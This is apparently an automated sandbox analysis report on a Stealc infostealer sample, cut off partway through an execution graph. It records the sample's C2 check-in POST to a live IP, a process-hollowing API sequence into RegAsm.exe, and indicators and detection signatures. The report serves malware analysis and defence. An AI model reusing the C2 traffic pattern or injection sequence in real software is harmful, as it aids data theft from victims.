https://www.entrust.net/rpa0 | file.exe | false | Avira URL Cloud: safe | unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.152.113.10 | unknown | Russian Federation | 138576 | CODECCLOUD-AS-APCodecCloudHKLimitedHK | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1508192
          Start date and time:2024-09-09 20:33:04 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@4/1@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 18
          • Number of non-executed functions: 18
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Stealc | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Stealc | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | PM7K6PbAf0.exe | malicious | LummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, Stealc | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Stealc | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
CODECCLOUD-AS-APCodecCloudHKLimitedHK | CVE-2024-38143 poc.exe | malicious | Codoso Ghost, UACMe | 38.147.172.126
CODECCLOUD-AS-APCodecCloudHKLimitedHK | Setup.exe | malicious | Go Injector, Stealc | 45.152.114.50
CODECCLOUD-AS-APCodecCloudHKLimitedHK | Setup.exe | malicious | Go Injector, Stealc | 45.152.114.50
          No context
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):226
          Entropy (8bit):5.360398796477698
          Encrypted:false
          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
          MD5:3A8957C6382192B71471BD14359D0B12
          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
          Malicious:true
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.97306060156867
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:210'472 bytes
          MD5:1a3ac0bc9af8e3b8cc72caaf6ba88b9f
          SHA1:885872fa24d22d8b9c118174ed3d7b7419e58fe0
          SHA256:ab6d864f42680ad444f9a445d3e403cfd1a6355985db933611ec4cb7607b76bf
          SHA512:a59b1c0530fb8fd2881d605b8513107df79a844d52a754b901b0a027fb197a20ce42ce342155b635f383e4aae52de255355213b14fb479dbf2d533e355af4426
          SSDEEP:6144:9gPmLyZ30IcCX4PWNlclz7o+pNb6CPSUbv+/QTEO:9gPmLK33X52voGNS2+YTEO
          TLSH:802413A48ED14A32FDFB0F7224949236FAF9E1543A234EF731B48A13CD566152F4532A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..f.............................$... ...@....@.. ....................................`................................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x4324be
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x66DF145E [Mon Sep 9 15:29:34 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Signature Valid:false
          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/01/2023 01:00:00 17/01/2026 00:59:59
          Subject Chain
          • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
          Version:3
          Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
          Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
          Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
          Serial:0997C56CAA59055394D9A9CDB8BEEB56
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3246c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x5f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x31000 | 0x2628 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x36000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x32334 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x304c4 | 0x30600 | e4c32561d82fe48c7547af11aaf60d8a | False | 0.9910973837209303 | data | 7.9902895044889775 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x34000 | 0x5f0 | 0x600 | 80e72658b6ff4c9e5bddd6f5838c5108 | False | 0.44921875 | data | 4.187104311772739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x36000 | 0xc | 0x200 | 86019e23b1d9eea0b397582d388c8688 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x340a0 | 0x360 | data | | | 0.4548611111111111
RT_MANIFEST | 0x34400 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-09T20:33:59.230715+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49713 | 45.152.113.10 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 20:33:58.553092003 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:33:58.559329033 CEST | 80 | 49713 | 45.152.113.10 | 192.168.2.6
Sep 9, 2024 20:33:58.559458017 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:33:58.560165882 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:33:58.566359043 CEST | 80 | 49713 | 45.152.113.10 | 192.168.2.6
Sep 9, 2024 20:33:59.086386919 CEST | 80 | 49713 | 45.152.113.10 | 192.168.2.6
Sep 9, 2024 20:33:59.086479902 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:33:59.091212034 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:33:59.096044064 CEST | 80 | 49713 | 45.152.113.10 | 192.168.2.6
Sep 9, 2024 20:33:59.230652094 CEST | 80 | 49713 | 45.152.113.10 | 192.168.2.6
Sep 9, 2024 20:33:59.230715036 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
Sep 9, 2024 20:34:00.360238075 CEST | 49713 | 80 | 192.168.2.6 | 45.152.113.10
          • 45.152.113.10
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 45.152.113.10 | 80 | 3000 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Sep 9, 2024 20:33:58.560165882 CEST | 88 | OUT | GET / HTTP/1.1
          Host: 45.152.113.10
          Connection: Keep-Alive
          Cache-Control: no-cache
Sep 9, 2024 20:33:59.086386919 CEST | 203 | IN | HTTP/1.1 200 OK
          Date: Mon, 09 Sep 2024 18:33:59 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
Sep 9, 2024 20:33:59.091212034 CEST | 414 | OUT | POST /92335b4816f77e90.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB
          Host: 45.152.113.10
          Content-Length: 214
          Connection: Keep-Alive
          Cache-Control: no-cache
          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 32 44 41 38 46 46 42 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a
          Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="hwid"84D2DA8FFBD41068540764------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build"default------KJKKKJJJKJKFHJJJJECB--
Sep 9, 2024 20:33:59.230652094 CEST | 210 | IN | HTTP/1.1 200 OK
          Date: Mon, 09 Sep 2024 18:33:59 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Data Raw: 59 6d 78 76 59 32 73 3d
          Data Ascii: YmxvY2s=


          Target ID:0
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x5f0000
          File size:210'472 bytes
          MD5 hash:1A3AC0BC9AF8E3B8CC72CAAF6BA88B9F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0xec0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true


            Execution Graph

            Execution Coverage:36%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:25%
            Total number of Nodes:24
            Total number of Limit Nodes:1
            execution_graph 327 f70987 328 f7099c 327->328 332 f70b47 VirtualProtect 328->332 329 f709c9 330 f704b0 VirtualProtect 329->330 331 f70a07 329->331 330->331 332->329 305 2912439 306 2912471 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 305->306 308 291264e WriteProcessMemory 306->308 309 2912693 308->309 310 29126d5 WriteProcessMemory Wow64SetThreadContext ResumeThread 309->310 311 2912698 WriteProcessMemory 309->311 311->309 312 f70988 313 f7099c 312->313 318 f70b47 313->318 314 f709c9 316 f70a07 314->316 323 f704b0 314->323 319 f70b59 318->319 320 f70e0b VirtualProtect 319->320 322 f70d9d 319->322 321 f70e48 320->321 321->314 322->314 324 f70dc0 VirtualProtect 323->324 326 f70e48 324->326 326->316

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_00F70AF7 1 Function_00F70E77 33 Function_00F701C0 1->33 2 Function_00F70475 3 Function_00F70471 4 Function_00F704F1 5 Function_00F70170 6 Function_00F700F0 7 Function_00F70070 8 Function_00F70978 9 Function_00F708E7 10 Function_02912780 11 Function_00F70465 12 Function_00F700E4 13 Function_00F70461 14 Function_00F70160 15 Function_00F70060 16 Function_00F70A6F 17 Function_00F7046D 18 Function_00F70469 19 Function_00F708E8 20 Function_00F70054 21 Function_00F700D4 22 Function_00F70154 23 Function_00F70450 24 Function_00F701D0 25 Function_02912439 26 Function_00F7045D 27 Function_00F704D8 28 Function_00F708D8 29 Function_00F70B47 30 Function_00F70847 31 Function_02912121 32 Function_00F70444 34 Function_00F70848 35 Function_00F700C8 36 Function_00F70148 37 Function_00F704C8 38 Function_00F701B4 39 Function_00F704B0 40 Function_00F700B0 41 Function_00F704BC 41->33 42 Function_00F700BC 43 Function_00F7013C 44 Function_0291275C 45 Function_00F704A4 46 Function_00F700A0 47 Function_00F7012C 48 Function_00F701A8 49 Function_00F70F97 49->33 50 Function_00F70190 51 Function_00F70090 52 Function_00F70F90 53 Function_00F7011C 54 Function_00F7019C 55 Function_00F70987 55->29 55->39 55->41 55->45 56 Function_00F70B07 57 Function_00F70501 58 Function_00F70080 59 Function_00F70100 60 Function_00F70180 61 Function_00F7010C 62 Function_00F70F8A 63 Function_0291286C 64 Function_00F70988 64->29 64->39 64->41 64->45 65 Function_00F70B08

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029123AB,0291239B), ref: 029125A8
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029125BB
            • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 029125D9
            • ReadProcessMemory.KERNELBASE(00000304,?,029123EF,00000004,00000000), ref: 029125FD
            • VirtualAllocEx.KERNELBASE(00000304,?,?,00003000,00000040), ref: 02912628
            • WriteProcessMemory.KERNELBASE(00000304,00000000,?,?,00000000,?), ref: 02912680
            • WriteProcessMemory.KERNELBASE(00000304,00400000,?,?,00000000,?,00000028), ref: 029126CB
            • WriteProcessMemory.KERNELBASE(00000304,?,?,00000004,00000000), ref: 02912709
            • Wow64SetThreadContext.KERNEL32(0000008C,02740000), ref: 02912745
            • ResumeThread.KERNELBASE(0000008C), ref: 02912754
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2136050112.0000000002912000.00000040.00000800.00020000.00000000.sdmp, Offset: 02912000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2912000_file.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
            • API String ID: 2687962208-1257834847
            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction ID: 6e3fa19c5c9dc122e19aa43612b29058edd9abc10285370f096cd47ee209edd2
            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction Fuzzy Hash: 88B1E67664024AAFDB60CF69CC80BDA77A9FF88714F158524EA0CAB341D774FA41CB94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 23 f70b47-f70b7c 27 f70b7e-f70b8c 23->27 29 f70da7-f70e46 VirtualProtect 27->29 30 f70b92-f70bb2 27->30 37 f70e4d-f70e61 29->37 38 f70e48 29->38 30->29 31 f70bb8-f70bc3 30->31 31->29 33 f70bc9-f70bd4 31->33 33->27 34 f70bd6-f70bdb 33->34 36 f70bde-f70be3 34->36 36->29 39 f70be9-f70bf6 36->39 38->37 39->29 40 f70bfc-f70c08 39->40 41 f70c11-f70c16 40->41 42 f70c0a-f70c10 40->42 41->29 43 f70c1c-f70c23 41->43 42->41 43->29 44 f70c29-f70c2f 43->44 44->29 45 f70c35-f70c40 44->45 45->36 46 f70c42-f70c51 45->46 47 f70c57-f70c5e 46->47 48 f70d9d-f70da4 46->48 49 f70c60-f70c67 47->49 50 f70c68-f70c70 47->50 49->50 50->29 51 f70c76-f70c82 50->51 52 f70c84-f70c8a 51->52 53 f70c8b-f70c90 51->53 52->53 53->29 54 f70c96-f70c9d 53->54 54->29 55 f70ca3-f70ca9 54->55 55->29 56 f70caf-f70cc5 55->56 57 f70cc7-f70cce 56->57 58 f70ccf-f70cfd 56->58 57->58 61 f70cff-f70d04 58->61 62 f70d0c-f70d16 58->62 61->62 62->29 63 f70d1c-f70d25 62->63 63->29 64 f70d2b-f70d4a 63->64 65 f70d4c-f70d51 64->65 66 f70d59-f70d63 64->66 65->66 66->29 67 f70d65-f70d6a 66->67 67->29 68 f70d6c-f70d97 67->68 68->47 68->48
            APIs
            • VirtualProtect.KERNELBASE(03913594,?,?,?,?,?,?,?,00000000,?,?,00F70A07,?,00000040), ref: 00F70E39
            Memory Dump Source
            • Source File: 00000000.00000002.2135891784.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f70000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 2cab5e1b750a1fb79ccaa1ef67acf4f45083b316fe6f9ab8d24f8d30b890cc2a
            • Instruction ID: 389c89f24aa046c671292bacc4027f4b8ee896b7bbeaf88d54fd9810bff8b966
            • Opcode Fuzzy Hash: 2cab5e1b750a1fb79ccaa1ef67acf4f45083b316fe6f9ab8d24f8d30b890cc2a
            • Instruction Fuzzy Hash: A0A19F70904255CFCB11CFA9C880AADFBF2BF88314F14C5AAD899AB256C774ED41DB91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 71 f704b0-f70e46 VirtualProtect 74 f70e4d-f70e61 71->74 75 f70e48 71->75 75->74
            APIs
            • VirtualProtect.KERNELBASE(03913594,?,?,?,?,?,?,?,00000000,?,?,00F70A07,?,00000040), ref: 00F70E39
            Memory Dump Source
            • Source File: 00000000.00000002.2135891784.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f70000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: e09c56b172cccb4cde2bd730106a7d5b4dbd137b1d85e7de0b62a75c72723a43
            • Instruction ID: 9c02c06f79a132eec1d2fad43d92e3a3c7ab5c720422d8eb3160e8b04dd1f07b
            • Opcode Fuzzy Hash: e09c56b172cccb4cde2bd730106a7d5b4dbd137b1d85e7de0b62a75c72723a43
            • Instruction Fuzzy Hash: 7821C0B5905619EFCB10DF9AD884ADEFBB4FF48314F10812AE918A7200D7B4A954CFA5

            Execution Graph

            Execution Coverage:13.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0.7%
            Total number of Nodes:1510
            Total number of Limit Nodes:3
execution_graph
14129->14128 14130 412ea8 14129->14130 14131 412c6a 14129->14131 14132 4060f0 4 API calls 14130->14132 14131->13772 14132->14131 14133->14131 14134->14131 14137 4139d9 ctype 14135->14137 14136 4139ff ctype 14136->13776 14137->14136 14138 414c70 7 API calls 14137->14138 14138->14137 14140 416d9e 14139->14140 14143 416b70 ??_U@YAPAXI 14140->14143 14142 416dad 14142->13790 14158 41a110 14143->14158 14145 416bb1 OpenProcess 14146 416be8 allocator 14145->14146 14157 416bcb 14145->14157 14147 416bf5 memset 14146->14147 14148 416d4e ??_V@YAXPAX 14146->14148 14150 416c65 14146->14150 14151 416c79 ReadProcessMemory 14146->14151 14154 4080a0 memcpy codecvt 14146->14154 14155 416d15 14146->14155 14167 416dc0 14146->14167 14173 416600 14146->14173 14160 4169a0 strlen ??_U@YAPAXI 14147->14160 14148->14157 14150->14148 14151->14146 14154->14146 14187 4080a0 14155->14187 14157->14142 14159 41a120 14158->14159 14159->14145 14190 416670 strlen 14160->14190 14162 416a0c 14163 416a24 VirtualQueryEx 14162->14163 14165 416880 ReadProcessMemory 14162->14165 14166 416aa8 14162->14166 14163->14162 14164 416b49 ??_V@YAXPAX 14163->14164 14164->14166 14165->14162 14166->14146 14168 416dd1 allocator 14167->14168 14194 4082d0 14168->14194 14170 416de5 14198 4082a0 14170->14198 14174 416dc0 9 API calls 14173->14174 14175 416613 14174->14175 14277 416e40 14175->14277 14178 41662f 14281 416e70 14178->14281 14179 41664e 14285 4095a0 14179->14285 14184 4080a0 codecvt memcpy 14186 416649 14184->14186 14185 4080a0 codecvt memcpy 14185->14186 14186->14146 14188 4082d0 codecvt memcpy 14187->14188 14189 4080b3 task 14188->14189 14189->14157 14191 4166a1 strlen 14190->14191 14192 416800 14191->14192 14193 4166b7 14191->14193 14192->14162 14193->14191 14195 4082e3 14194->14195 14197 4082e1 codecvt task 14194->14197 14195->14197 14203 407230 memcpy 14195->14203 14197->14170 14204 407210 strlen 14198->14204 14200 4082b0 14205 408660 14200->14205 14202 4082c0 14202->14146 14203->14197 14204->14200 14206 
